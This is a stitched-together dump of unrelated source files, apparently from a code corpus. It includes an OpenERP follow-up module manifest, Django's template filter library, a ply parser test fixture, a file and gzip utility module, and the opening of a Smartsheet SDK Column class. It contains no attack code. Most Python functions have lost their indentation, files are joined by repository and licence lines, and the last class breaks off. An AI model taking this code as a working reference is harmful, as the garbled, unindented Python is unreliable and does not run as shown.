# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Payment Follow-up Management',
'version': '1.0',
'category': 'Accounting & Finance',
'description': """
Module to automate letters for unpaid invoices, with multi-level recalls.
=========================================================================
You can define your multiple levels of recall through the menu:
---------------------------------------------------------------
Configuration / Follow-Up Levels
Once it is defined, you can automatically print recalls every day through simply clicking on the menu:
------------------------------------------------------------------------------------------------------
Payment Follow-Up / Send Email and letters
It will generate a PDF / send emails / set manual actions according to the the different levels
of recall defined. You can define different policies for different companies.
Note that if you want to check the follow-up level for a given partner/account entry, you can do from in the menu:
------------------------------------------------------------------------------------------------------------------
Reporting / Accounting / **Follow-ups Analysis
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'images': ['images/follow_ups.jpeg','images/send_followups.jpeg'],
'depends': ['account_accountant', 'mail'],
'data': [
'security/account_followup_security.xml',
'security/ir.model.access.csv',
'report/account_followup_report.xml',
'account_followup_data.xml',
'account_followup_view.xml',
'account_followup_customers.xml',
'wizard/account_followup_print_view.xml',
],
'demo': ['account_followup_demo.xml'],
'test': [
'test/account_followup.yml',
#TODO 'test/account_followup_report.yml', --> Need to wait for second step in order to check report (expects after first)
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
riklaunim/django-custom-multisite | django/template/defaultfilters.py | 78 | 28490 | """Default variable filters."""
import re
import random as random_module
import unicodedata
from decimal import Decimal, InvalidOperation, Context, ROUND_HALF_UP
from functools import wraps
from pprint import pformat
from django.template.base import Variable, Library, VariableDoesNotExist
from django.conf import settings
from django.utils import formats
from django.utils.dateformat import format, time_format
from django.utils.encoding import force_unicode, iri_to_uri
from django.utils.html import (conditional_escape, escapejs, fix_ampersands,
escape, urlize as urlize_impl, linebreaks, strip_tags)
from django.utils.http import urlquote
from django.utils.text import Truncator, wrap, phone2numeric
from django.utils.safestring import mark_safe, SafeData, mark_for_escaping
from django.utils.timesince import timesince, timeuntil
from django.utils.translation import ugettext, ungettext
from django.utils.text import normalize_newlines
register = Library()
#######################
# STRING DECORATOR #
#######################
def stringfilter(func):
"""
Decorator for filters which should only receive unicode objects. The object
passed as the first positional argument will be converted to a unicode
object.
"""
def _dec(*args, **kwargs):
if args:
args = list(args)
args[0] = force_unicode(args[0])
if (isinstance(args[0], SafeData) and
getattr(_dec._decorated_function, 'is_safe', False)):
return mark_safe(func(*args, **kwargs))
return func(*args, **kwargs)
# Include a reference to the real function (used to check original
# arguments by the template parser, and to bear the 'is_safe' attribute
# when multiple decorators are applied).
_dec._decorated_function = getattr(func, '_decorated_function', func)
for attr in ('is_safe', 'needs_autoescape'):
if hasattr(func, attr):
import warnings
warnings.warn("Setting the %s attribute of a template filter "
"function is deprecated; use @register.filter(%s=%s) "
"instead" % (attr, attr, getattr(func, attr)),
PendingDeprecationWarning)
setattr(_dec, attr, getattr(func, attr))
return wraps(func)(_dec)
###################
# STRINGS #
###################
@register.filter(is_safe=True)
@stringfilter
def addslashes(value):
"""
Adds slashes before quotes. Useful for escaping strings in CSV, for
example. Less useful for escaping JavaScript; use the ``escapejs``
filter instead.
"""
return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
@register.filter(is_safe=True)
@stringfilter
def capfirst(value):
"""Capitalizes the first character of the value."""
return value and value[0].upper() + value[1:]
@register.filter("escapejs")
@stringfilter
def escapejs_filter(value):
"""Hex encodes characters for use in JavaScript strings."""
return escapejs(value)
@register.filter("fix_ampersands", is_safe=True)
@stringfilter
def fix_ampersands_filter(value):
"""Replaces ampersands with ``&`` entities."""
return fix_ampersands(value)
# Values for testing floatformat input against infinity and NaN representations,
# which differ across platforms and Python versions. Some (i.e. old Windows
# ones) are not recognized by Decimal but we want to return them unchanged vs.
# returning an empty string as we do for completley invalid input. Note these
# need to be built up from values that are not inf/nan, since inf/nan values do
# not reload properly from .pyc files on Windows prior to some level of Python 2.5
# (see Python Issue757815 and Issue1080440).
pos_inf = 1e200 * 1e200
neg_inf = -1e200 * 1e200
nan = (1e200 * 1e200) // (1e200 * 1e200)
special_floats = [str(pos_inf), str(neg_inf), str(nan)]
@register.filter(is_safe=True)
def floatformat(text, arg=-1):
"""
Displays a float to a specified number of decimal places.
If called without an argument, it displays the floating point number with
one decimal place -- but only if there's a decimal place to be displayed:
* num1 = 34.23234
* num2 = 34.00000
* num3 = 34.26000
* {{ num1|floatformat }} displays "34.2"
* {{ num2|floatformat }} displays "34"
* {{ num3|floatformat }} displays "34.3"
If arg is positive, it will always display exactly arg number of decimal
places:
* {{ num1|floatformat:3 }} displays "34.232"
* {{ num2|floatformat:3 }} displays "34.000"
* {{ num3|floatformat:3 }} displays "34.260"
If arg is negative, it will display arg number of decimal places -- but
only if there are places to be displayed:
* {{ num1|floatformat:"-3" }} displays "34.232"
* {{ num2|floatformat:"-3" }} displays "34"
* {{ num3|floatformat:"-3" }} displays "34.260"
If the input float is infinity or NaN, the (platform-dependent) string
representation of that value will be displayed.
"""
try:
input_val = force_unicode(text)
d = Decimal(input_val)
except UnicodeEncodeError:
return u''
except InvalidOperation:
if input_val in special_floats:
return input_val
try:
d = Decimal(force_unicode(float(text)))
except (ValueError, InvalidOperation, TypeError, UnicodeEncodeError):
return u''
try:
p = int(arg)
except ValueError:
return input_val
try:
m = int(d) - d
except (ValueError, OverflowError, InvalidOperation):
return input_val
if not m and p < 0:
return mark_safe(formats.number_format(u'%d' % (int(d)), 0))
if p == 0:
exp = Decimal(1)
else:
exp = Decimal(u'1.0') / (Decimal(10) ** abs(p))
try:
# Set the precision high enough to avoid an exception, see #15789.
tupl = d.as_tuple()
units = len(tupl[1]) - tupl[2]
prec = abs(p) + units + 1
# Avoid conversion to scientific notation by accessing `sign`, `digits`
# and `exponent` from `Decimal.as_tuple()` directly.
sign, digits, exponent = d.quantize(exp, ROUND_HALF_UP,
Context(prec=prec)).as_tuple()
digits = [unicode(digit) for digit in reversed(digits)]
while len(digits) <= abs(exponent):
digits.append(u'0')
digits.insert(-exponent, u'.')
if sign:
digits.append(u'-')
number = u''.join(reversed(digits))
return mark_safe(formats.number_format(number, abs(p)))
except InvalidOperation:
return input_val
@register.filter(is_safe=True)
@stringfilter
def iriencode(value):
"""Escapes an IRI value for use in a URL."""
return force_unicode(iri_to_uri(value))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linenumbers(value, autoescape=None):
"""Displays text with line numbers."""
lines = value.split(u'\n')
# Find the maximum width of the line count, for use with zero padding
# string format command
width = unicode(len(unicode(len(lines))))
if not autoescape or isinstance(value, SafeData):
for i, line in enumerate(lines):
lines[i] = (u"%0" + width + u"d. %s") % (i + 1, line)
else:
for i, line in enumerate(lines):
lines[i] = (u"%0" + width + u"d. %s") % (i + 1, escape(line))
return mark_safe(u'\n'.join(lines))
@register.filter(is_safe=True)
@stringfilter
def lower(value):
"""Converts a string into all lowercase."""
return value.lower()
@register.filter(is_safe=False)
@stringfilter
def make_list(value):
"""
Returns the value turned into a list.
For an integer, it's a list of digits.
For a string, it's a list of characters.
"""
return list(value)
@register.filter(is_safe=True)
@stringfilter
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
"""
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
return mark_safe(re.sub('[-\s]+', '-', value))
@register.filter(is_safe=True)
def stringformat(value, arg):
"""
Formats the variable according to the arg, a string formatting specifier.
This specifier uses Python string formating syntax, with the exception that
the leading "%" is dropped.
See http://docs.python.org/lib/typesseq-strings.html for documentation
of Python string formatting
"""
try:
return (u"%" + unicode(arg)) % value
except (ValueError, TypeError):
return u""
@register.filter(is_safe=True)
@stringfilter
def title(value):
"""Converts a string into titlecase."""
t = re.sub("([a-z])'([A-Z])", lambda m: m.group(0).lower(), value.title())
return re.sub("\d([A-Z])", lambda m: m.group(0).lower(), t)
@register.filter(is_safe=True)
@stringfilter
def truncatechars(value, arg):
"""
Truncates a string after a certain number of characters.
Argument: Number of characters to truncate after.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).chars(length)
@register.filter(is_safe=True)
@stringfilter
def truncatewords(value, arg):
"""
Truncates a string after a certain number of words.
Argument: Number of words to truncate after.
Newlines within the string are removed.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).words(length, truncate=' ...')
@register.filter(is_safe=True)
@stringfilter
def truncatewords_html(value, arg):
"""
Truncates HTML after a certain number of words.
Argument: Number of words to truncate after.
Newlines in the HTML are preserved.
"""
try:
length = int(arg)
except ValueError: # invalid literal for int()
return value # Fail silently.
return Truncator(value).words(length, html=True, truncate=' ...')
@register.filter(is_safe=False)
@stringfilter
def upper(value):
"""Converts a string into all uppercase."""
return value.upper()
@register.filter(is_safe=False)
@stringfilter
def urlencode(value, safe=None):
"""
Escapes a value for use in a URL.
Takes an optional ``safe`` parameter used to determine the characters which
should not be escaped by Django's ``urlquote`` method. If not provided, the
default safe characters will be used (but an empty string can be provided
when *all* characters should be escaped).
"""
kwargs = {}
if safe is not None:
kwargs['safe'] = safe
return urlquote(value, **kwargs)
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlize(value, autoescape=None):
"""Converts URLs in plain text into clickable links."""
return mark_safe(urlize_impl(value, nofollow=True, autoescape=autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlizetrunc(value, limit, autoescape=None):
"""
Converts URLs into clickable links, truncating URLs to the given character
limit, and adding 'rel=nofollow' attribute to discourage spamming.
Argument: Length to truncate URLs to.
"""
return mark_safe(urlize_impl(value, trim_url_limit=int(limit), nofollow=True,
autoescape=autoescape))
@register.filter(is_safe=False)
@stringfilter
def wordcount(value):
"""Returns the number of words."""
return len(value.split())
@register.filter(is_safe=True)
@stringfilter
def wordwrap(value, arg):
"""
Wraps words at specified line length.
Argument: number of characters to wrap the text at.
"""
return wrap(value, int(arg))
@register.filter(is_safe=True)
@stringfilter
def ljust(value, arg):
"""
Left-aligns the value in a field of a given width.
Argument: field size.
"""
return value.ljust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def rjust(value, arg):
"""
Right-aligns the value in a field of a given width.
Argument: field size.
"""
return value.rjust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def center(value, arg):
"""Centers the value in a field of a given width."""
return value.center(int(arg))
@register.filter
@stringfilter
def cut(value, arg):
    """
    Removes all values of arg from the given string.
    """
    # Remember whether the input was already marked safe; str.replace()
    # returns a plain (unsafe) string, so safeness must be re-applied below.
    safe = isinstance(value, SafeData)
    value = value.replace(arg, u'')
    # The ';' case is deliberately NOT re-marked safe -- presumably because
    # stripping ';' can leave broken HTML-entity fragments (e.g. '&amp;'
    # becomes '&amp'), which would then be emitted unescaped.
    if safe and arg != ';':
        return mark_safe(value)
    return value
###################
# HTML STRINGS #
###################
@register.filter("escape", is_safe=True)
@stringfilter
def escape_filter(value):
    """
    Marks the value as a string that should be auto-escaped.

    Escaping is deferred to output time (contrast with ``force_escape``,
    which escapes immediately), so applying this filter repeatedly still
    escapes only once.
    """
    return mark_for_escaping(value)
@register.filter(is_safe=True)
@stringfilter
def force_escape(value):
"""
Escapes a string's HTML. This returns a new string containing the escaped
characters (as opposed to "escape", which marks the content for later
possible escaping).
"""
return mark_safe(escape(value))
@register.filter("linebreaks", is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaks_filter(value, autoescape=None):
"""
Replaces line breaks in plain text with appropriate HTML; a single
newline becomes an HTML line break (``<br />``) and a new line
followed by a blank line becomes a paragraph break (``</p>``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
return mark_safe(linebreaks(value, autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaksbr(value, autoescape=None):
"""
Converts all newlines in a piece of plain text to HTML line breaks
(``<br />``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
value = normalize_newlines(value)
if autoescape:
value = escape(value)
return mark_safe(value.replace('\n', '<br />'))
@register.filter(is_safe=True)
@stringfilter
def safe(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_safe(value)
@register.filter(is_safe=True)
def safeseq(value):
"""
A "safe" filter for sequences. Marks each element in the sequence,
individually, as safe, after converting them to unicode. Returns a list
with the results.
"""
return [mark_safe(force_unicode(obj)) for obj in value]
@register.filter(is_safe=True)
@stringfilter
def removetags(value, tags):
"""Removes a space separated list of [X]HTML tags from the output."""
tags = [re.escape(tag) for tag in tags.split()]
tags_re = u'(%s)' % u'|'.join(tags)
starttag_re = re.compile(ur'<%s(/?>|(\s+[^>]*>))' % tags_re, re.U)
endtag_re = re.compile(u'</%s>' % tags_re)
value = starttag_re.sub(u'', value)
value = endtag_re.sub(u'', value)
return value
@register.filter(is_safe=True)
@stringfilter
def striptags(value):
"""Strips all [X]HTML tags."""
return strip_tags(value)
###################
# LISTS #
###################
@register.filter(is_safe=False)
def dictsort(value, arg):
"""
Takes a list of dicts, returns that list sorted by the property given in
the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve)
except (TypeError, VariableDoesNotExist):
return u''
@register.filter(is_safe=False)
def dictsortreversed(value, arg):
"""
Takes a list of dicts, returns that list sorted in reverse order by the
property given in the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve, reverse=True)
except (TypeError, VariableDoesNotExist):
return u''
@register.filter(is_safe=False)
def first(value):
"""Returns the first item in a list."""
try:
return value[0]
except IndexError:
return u''
@register.filter(is_safe=True, needs_autoescape=True)
def join(value, arg, autoescape=None):
    """
    Joins a list with a string, like Python's ``str.join(list)``.
    """
    # Coerce every element to unicode first so join() cannot fail on
    # non-string items.
    value = map(force_unicode, value)
    if autoescape:
        value = [conditional_escape(v) for v in value]
    try:
        data = conditional_escape(arg).join(value)
    except AttributeError: # fail silently but nicely
        # arg had no join-able string form; return the (converted) list.
        return value
    return mark_safe(data)
@register.filter(is_safe=True)
def last(value):
"Returns the last item in a list"
try:
return value[-1]
except IndexError:
return u''
@register.filter(is_safe=True)
def length(value):
"""Returns the length of the value - useful for lists."""
try:
return len(value)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=False)
def length_is(value, arg):
"""Returns a boolean of whether the value's length is the argument."""
try:
return len(value) == int(arg)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
def random(value):
"""Returns a random item from the list."""
return random_module.choice(value)
@register.filter("slice", is_safe=True)
def slice_filter(value, arg):
    """
    Returns a slice of the list.
    Uses the same syntax as Python's list slicing; see
    http://diveintopython.org/native_data_types/lists.html#odbchelper.list.slice
    for an introduction.
    """
    try:
        # Empty segments (e.g. the '' in ':3') become None, exactly as in
        # Python's own slice syntax.
        parts = [int(piece) if piece else None for piece in arg.split(u':')]
        return value[slice(*parts)]
    except (ValueError, TypeError):
        return value # Fail silently.
@register.filter(is_safe=True, needs_autoescape=True)
def unordered_list(value, autoescape=None):
"""
Recursively takes a self-nested list and returns an HTML unordered list --
WITHOUT opening and closing <ul> tags.
The list is assumed to be in the proper format. For example, if ``var``
contains: ``['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]``,
then ``{{ var|unordered_list }}`` would return::
<li>States
<ul>
<li>Kansas
<ul>
<li>Lawrence</li>
<li>Topeka</li>
</ul>
</li>
<li>Illinois</li>
</ul>
</li>
"""
if autoescape:
escaper = conditional_escape
else:
escaper = lambda x: x
def convert_old_style_list(list_):
"""
Converts old style lists to the new easier to understand format.
The old list format looked like:
['Item 1', [['Item 1.1', []], ['Item 1.2', []]]
And it is converted to:
['Item 1', ['Item 1.1', 'Item 1.2]]
"""
if not isinstance(list_, (tuple, list)) or len(list_) != 2:
return list_, False
first_item, second_item = list_
if second_item == []:
return [first_item], True
try:
# see if second item is iterable
iter(second_item)
except TypeError:
return list_, False
old_style_list = True
new_second_item = []
for sublist in second_item:
item, old_style_list = convert_old_style_list(sublist)
if not old_style_list:
break
new_second_item.extend(item)
if old_style_list:
second_item = new_second_item
return [first_item, second_item], old_style_list
def _helper(list_, tabs=1):
indent = u'\t' * tabs
output = []
list_length = len(list_)
i = 0
while i < list_length:
title = list_[i]
sublist = ''
sublist_item = None
if isinstance(title, (list, tuple)):
sublist_item = title
title = ''
elif i < list_length - 1:
next_item = list_[i+1]
if next_item and isinstance(next_item, (list, tuple)):
# The next item is a sub-list.
sublist_item = next_item
# We've processed the next item now too.
i += 1
if sublist_item:
sublist = _helper(sublist_item, tabs+1)
sublist = '\n%s<ul>\n%s\n%s</ul>\n%s' % (indent, sublist,
indent, indent)
output.append('%s<li>%s%s</li>' % (indent,
escaper(force_unicode(title)), sublist))
i += 1
return '\n'.join(output)
value, converted = convert_old_style_list(value)
return mark_safe(_helper(value))
###################
# INTEGERS #
###################
@register.filter(is_safe=False)
def add(value, arg):
    """Adds the arg to the value."""
    # Prefer integer addition; fall back to the operands' own '+' (string
    # concatenation, list extension, ...), and fail silently otherwise.
    try:
        return int(value) + int(arg)
    except (ValueError, TypeError):
        pass
    try:
        return value + arg
    except Exception:
        return ''
@register.filter(is_safe=False)
def get_digit(value, arg):
    """
    Given a whole number, returns the requested digit of it, where 1 is the
    right-most digit, 2 is the second-right-most digit, etc. Returns the
    original value for invalid input (if input or argument is not an integer,
    or if argument is less than 1). Otherwise, output is always an integer.
    """
    try:
        position = int(arg)
        number = int(value)
    except ValueError:
        # Non-numeric input or argument: fail silently.
        return value
    if position < 1:
        return number
    digits = str(number)
    if position > len(digits):
        # Asking for a digit beyond the number's width yields 0.
        return 0
    return int(digits[-position])
###################
# DATES #
###################
@register.filter(expects_localtime=True, is_safe=False)
def date(value, arg=None):
"""Formats a date according to the given format."""
if not value:
return u''
if arg is None:
arg = settings.DATE_FORMAT
try:
return formats.date_format(value, arg)
except AttributeError:
try:
return format(value, arg)
except AttributeError:
return ''
@register.filter(expects_localtime=True, is_safe=False)
def time(value, arg=None):
"""Formats a time according to the given format."""
if value in (None, u''):
return u''
if arg is None:
arg = settings.TIME_FORMAT
try:
return formats.time_format(value, arg)
except AttributeError:
try:
return time_format(value, arg)
except AttributeError:
return ''
@register.filter("timesince", is_safe=False)
def timesince_filter(value, arg=None):
"""Formats a date as the time since that date (i.e. "4 days, 6 hours")."""
if not value:
return u''
try:
if arg:
return timesince(value, arg)
return timesince(value)
except (ValueError, TypeError):
return u''
@register.filter("timeuntil", is_safe=False)
def timeuntil_filter(value, arg=None):
"""Formats a date as the time until that date (i.e. "4 days, 6 hours")."""
if not value:
return u''
try:
return timeuntil(value, arg)
except (ValueError, TypeError):
return u''
###################
# LOGIC #
###################
@register.filter(is_safe=False)
def default(value, arg):
"""If value is unavailable, use given default."""
return value or arg
@register.filter(is_safe=False)
def default_if_none(value, arg):
"""If value is None, use given default."""
if value is None:
return arg
return value
@register.filter(is_safe=False)
def divisibleby(value, arg):
"""Returns True if the value is devisible by the argument."""
return int(value) % int(arg) == 0
@register.filter(is_safe=False)
def yesno(value, arg=None):
"""
Given a string mapping values for true, false and (optionally) None,
returns one of those strings according to the value:
========== ====================== ==================================
Value Argument Outputs
========== ====================== ==================================
``True`` ``"yeah,no,maybe"`` ``yeah``
``False`` ``"yeah,no,maybe"`` ``no``
``None`` ``"yeah,no,maybe"`` ``maybe``
``None`` ``"yeah,no"`` ``"no"`` (converts None to False
if no mapping for None is given.
========== ====================== ==================================
"""
if arg is None:
arg = ugettext('yes,no,maybe')
bits = arg.split(u',')
if len(bits) < 2:
return value # Invalid arg.
try:
yes, no, maybe = bits
except ValueError:
# Unpack list of wrong size (no "maybe" value provided).
yes, no, maybe = bits[0], bits[1], bits[1]
if value is None:
return maybe
if value:
return yes
return no
###################
# MISC #
###################
@register.filter(is_safe=True)
def filesizeformat(bytes):
    """
    Formats the value like a 'human-readable' file size (i.e. 13 KB, 4.1 MB,
    102 bytes, etc).
    """
    try:
        bytes = float(bytes)
    except (TypeError,ValueError,UnicodeDecodeError):
        # Unparseable input is reported as "0 bytes" rather than raising.
        return ungettext("%(size)d byte", "%(size)d bytes", 0) % {'size': 0}
    # Locale-aware formatting, fixed at one decimal place.
    filesize_number_format = lambda value: formats.number_format(round(value, 1), 1)
    # Binary (1024-based) unit ladder, despite the KB/MB/... labels.
    if bytes < 1024:
        return ungettext("%(size)d byte", "%(size)d bytes", bytes) % {'size': bytes}
    if bytes < 1024 * 1024:
        return ugettext("%s KB") % filesize_number_format(bytes / 1024)
    if bytes < 1024 * 1024 * 1024:
        return ugettext("%s MB") % filesize_number_format(bytes / (1024 * 1024))
    if bytes < 1024 * 1024 * 1024 * 1024:
        return ugettext("%s GB") % filesize_number_format(bytes / (1024 * 1024 * 1024))
    if bytes < 1024 * 1024 * 1024 * 1024 * 1024:
        return ugettext("%s TB") % filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024))
    return ugettext("%s PB") % filesize_number_format(bytes / (1024 * 1024 * 1024 * 1024 * 1024))
@register.filter(is_safe=False)
def pluralize(value, arg=u's'):
"""
Returns a plural suffix if the value is not 1. By default, 's' is used as
the suffix:
* If value is 0, vote{{ value|pluralize }} displays "0 votes".
* If value is 1, vote{{ value|pluralize }} displays "1 vote".
* If value is 2, vote{{ value|pluralize }} displays "2 votes".
If an argument is provided, that string is used instead:
* If value is 0, class{{ value|pluralize:"es" }} displays "0 classes".
* If value is 1, class{{ value|pluralize:"es" }} displays "1 class".
* If value is 2, class{{ value|pluralize:"es" }} displays "2 classes".
If the provided argument contains a comma, the text before the comma is
used for the singular case and the text after the comma is used for the
plural case:
* If value is 0, cand{{ value|pluralize:"y,ies" }} displays "0 candies".
* If value is 1, cand{{ value|pluralize:"y,ies" }} displays "1 candy".
* If value is 2, cand{{ value|pluralize:"y,ies" }} displays "2 candies".
"""
if not u',' in arg:
arg = u',' + arg
bits = arg.split(u',')
if len(bits) > 2:
return u''
singular_suffix, plural_suffix = bits[:2]
try:
if int(value) != 1:
return plural_suffix
except ValueError: # Invalid string that's not a number.
pass
except TypeError: # Value isn't a string or a number; maybe it's a list?
try:
if len(value) != 1:
return plural_suffix
except TypeError: # len() of unsized object.
pass
return singular_suffix
@register.filter("phone2numeric", is_safe=True)
def phone2numeric_filter(value):
"""Takes a phone number and converts it in to its numerical equivalent."""
return phone2numeric(value)
@register.filter(is_safe=True)
def pprint(value):
"""A wrapper around pprint.pprint -- for debugging, really."""
try:
return pformat(value)
except Exception, e:
return u"Error in formatting: %s" % force_unicode(e, errors="replace")
| bsd-3-clause |
lastweek/gem5 | ext/ply/test/yacc_error1.py | 174 | 1530 | # -----------------------------------------------------------------------------
# yacc_error1.py
#
# Bad p_error() function
# -----------------------------------------------------------------------------
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.yacc as yacc
from calclex import tokens
# Parsing rules
precedence = (
('left','PLUS','MINUS'),
('left','TIMES','DIVIDE'),
('right','UMINUS'),
)
# dictionary of names
names = { }
def p_statement_assign(t):
'statement : NAME EQUALS expression'
names[t[1]] = t[3]
def p_statement_expr(t):
'statement : expression'
print(t[1])
def p_expression_binop(t):
    '''expression : expression PLUS expression
                  | expression MINUS expression
                  | expression TIMES expression
                  | expression DIVIDE expression'''
    # Dispatch on the operator token via a lookup table instead of an
    # if/elif ladder; unknown operators leave t[0] unset, as before.
    ops = {
        '+': lambda a, b: a + b,
        '-': lambda a, b: a - b,
        '*': lambda a, b: a * b,
        '/': lambda a, b: a / b,
    }
    fn = ops.get(t[2])
    if fn is not None:
        t[0] = fn(t[1], t[3])
def p_expression_uminus(t):
'expression : MINUS expression %prec UMINUS'
t[0] = -t[2]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_expression_name(t):
'expression : NAME'
try:
t[0] = names[t[1]]
except LookupError:
print("Undefined name '%s'" % t[1])
t[0] = 0
def p_error(t,s):
    # NOTE: the two-argument signature is deliberately wrong -- yacc expects
    # p_error(t). This file is a ply regression fixture ("Bad p_error()
    # function", see the header) exercising that diagnostic; do not "fix" it.
    print("Syntax error at '%s'" % t.value)
yacc.yacc()
| bsd-3-clause |
spatialexplore/idn_vam_wfp | python/utilities/directoryUtils.py | 1 | 3199 | #!/usr/bin/env python
"""
SYNOPSIS
TODO helloworld [-h,--help] [-v,--verbose] [--version]
DESCRIPTION
TODO This describes how to use this script. This docstring
will be printed by the script if there is an error or
if the user requests help (-h or --help).
EXAMPLES
TODO: Show some examples of how to use this script.
EXIT STATUS
TODO: List exit codes
AUTHOR
TODO: Name <name@example.org>
LICENSE
This script is in the public domain, free from copyrights or restrictions.
VERSION
$Id$
"""
__author__ = 'rochelle'
import os
#from os import listdir, path
import gzip
import re
def listMatchingFiles(base_dir, pattern):
    """Return full paths of the non-directory entries of ``base_dir`` whose
    names match ``pattern`` (``re.match``, anchored at the start of the
    name). An empty/None pattern matches everything. Returns [] when
    ``base_dir`` does not exist."""
    if not pattern:
        pattern = '.*'
    if not os.path.exists(base_dir):
        return []
    matches = []
    for entry in os.listdir(base_dir):
        full_path = os.path.join(base_dir, entry)
        if os.path.isdir(full_path):
            continue
        if re.match(pattern, entry):
            matches.append(full_path)
    return matches
def buildFileList(base_dir, extension='.tif'):
    """Return full paths of files directly under ``base_dir`` whose extension
    (as returned by os.path.splitext, dot included) equals ``extension``.
    Returns [] when ``base_dir`` does not exist; subdirectories are skipped."""
    if not os.path.exists(base_dir):
        return []
    result = []
    for name in os.listdir(base_dir):
        full_path = os.path.join(base_dir, name)
        if os.path.isdir(full_path):
            # skip directories
            continue
        if os.path.splitext(name)[1] == extension:
            result.append(full_path)
    return result
def getMatchingFiles(base_dir, filter):
    """Return full paths of non-directory entries of ``base_dir`` whose names
    match the regular expression ``filter`` (``re.match``, i.e. anchored at
    the start of the name). Returns [] for a missing directory.

    (The parameter name ``filter`` shadows the builtin but is kept for
    backward compatibility with keyword callers.)"""
    if not os.path.exists(base_dir):
        return []
    return [os.path.join(base_dir, name)
            for name in os.listdir(base_dir)
            if not os.path.isdir(os.path.join(base_dir, name))
            and re.match(filter, name)]
def getNewFilename(filename, prefix, ext, pattern, new_pattern):
    """Rename ``filename`` according to ``new_pattern``.

    ``pattern`` is a regex with a named group ``datestamp``. Every match of
    ``pattern`` in the basename is replaced by ``new_pattern`` formatted
    with ``prefix``, the captured ``datestamp`` and ``ext``; matches whose
    ``datestamp`` group is empty keep the original basename instead. The
    directory part of ``filename`` is preserved.

    Raises IndexError (from match.group) when ``pattern`` matches but has
    no ``datestamp`` group, matching the original behavior.
    """
    basename = os.path.basename(filename)

    def _replace(match):
        # Substitute only when a non-empty datestamp was captured; otherwise
        # keep the original basename for this match (fail-safe).
        if match.group('datestamp'):
            return new_pattern.format(prefix=prefix,
                                      datestamp=match.group('datestamp'),
                                      ext=ext)
        return basename

    # (The original also computed an unused `m = re.match(...)`; removed.)
    new_basename = re.sub(pattern, _replace, basename)
    return os.path.join(os.path.dirname(filename), new_basename)
def unzipFiles(base_dir, extension='.gz'):
    """Decompress every ``extension`` gzip file directly under ``base_dir``.

    Each archive is decompressed in place next to the original; the output
    name is the archive name with the trailing ``extension`` stripped (the
    original hard-coded a 3-character strip, which was wrong for extensions
    of any other length). The compressed files are left untouched.
    Returns 0 for backward compatibility.
    """
    for gz_path in buildFileList(base_dir, extension):
        # buildFileList only returns plain files, so no isdir() check needed.
        with gzip.open(gz_path, 'rb') as in_file:
            data = in_file.read()
        # Strip the extension to obtain the uncompressed output path.
        path_to_store = gz_path[:-len(extension)]
        with open(path_to_store, 'wb') as out_file:
            out_file.write(data)
    return 0
def unzipFile(fname, extension='.gz'):
    """Decompress the gzip file ``fname`` in place.

    The output file is ``fname`` with the trailing ``extension`` stripped
    (the original hard-coded a 3-character strip and ignored the
    ``extension`` parameter entirely). Returns the output filename.
    Files are opened via context managers so they are closed even on error.
    """
    outfilename = fname[:-len(extension)]
    with gzip.open(fname, 'rb') as in_file, open(outfilename, 'wb') as out_file:
        out_file.write(in_file.read())
    return outfilename
smartsheet-platform/smartsheet-python-sdk | smartsheet/models/column.py | 1 | 6169 | # pylint: disable=C0111,R0902,R0904,R0912,R0913,R0915,E1101
# Smartsheet Python SDK.
#
# Copyright 2018 Smartsheet.com, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from .auto_number_format import AutoNumberFormat
from .contact import Contact
from .enums import ColumnType, Symbol, SystemColumnType
from ..types import *
from ..util import serialize
from ..util import deserialize
class Column(object):
"""Smartsheet Column data model."""
def __init__(self, props=None, base_obj=None):
"""Initialize the Column model."""
self._base = None
if base_obj is not None:
self._base = base_obj
self._auto_number_format = TypedObject(AutoNumberFormat)
self._contact_options = TypedList(Contact)
self._description = String()
self._format_ = String()
self._formula = String()
self._hidden = Boolean()
self._id_ = Number()
self._index = Number()
self._locked = Boolean()
self._locked_for_user = Boolean()
self._options = TypedList(str)
self._primary = Boolean()
self._symbol = EnumeratedValue(Symbol)
self._system_column_type = EnumeratedValue(SystemColumnType)
self._tags = TypedList(str)
self._title = String()
self._type_ = EnumeratedValue(ColumnType)
self._width = Number()
self._validation = Boolean()
self._version = Number()
if props:
deserialize(self, props)
